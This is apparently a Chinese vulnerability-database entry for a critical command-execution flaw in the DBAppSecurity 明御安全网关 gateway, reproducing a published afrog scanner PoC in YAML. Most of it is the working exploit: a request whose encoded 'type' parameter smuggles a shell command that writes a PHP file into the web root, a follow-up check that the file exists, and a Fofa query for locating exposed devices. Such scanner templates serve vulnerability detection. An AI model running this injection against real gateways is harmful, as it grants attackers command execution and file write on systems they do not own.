dbappsecurity-aaa-portal-auth-config-reset-type-rce: 明御安全网关命令执行

日期: 2025-09-01 | 影响软件: DB App Security明御安全网关 | POC: 已公开

漏洞描述

Fofa: title="明御安全网关"

PoC代码[已公开]

id: dbappsecurity-aaa-portal-auth-config-reset-type-rce

info:
  name: 明御安全网关命令执行
  author: zan8in
  severity: critical
  verified: true
  description: |-
    Fofa: title="明御安全网关"
  tags: dbappsecurity,rce
  created: 2023/12/08

set:
  randstr: randomLowercase(6)
rules:
  r0:
    request:
      method: GET
      path: /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22test%20-%20Open%20source%20project%20%28github.com%2Ftest%2Ftest%29%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2F{{randstr}}.php%0a
    expression: response.status == 200 
  r1:
    request:
      method: GET
      path: /{{randstr}}.php
    expression: response.status == 200 && response.body.bcontains(b'(github.com/test/test)')
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dbappsecurity-aaa-portal-auth-config-reset-type-rce.yaml

相关漏洞推荐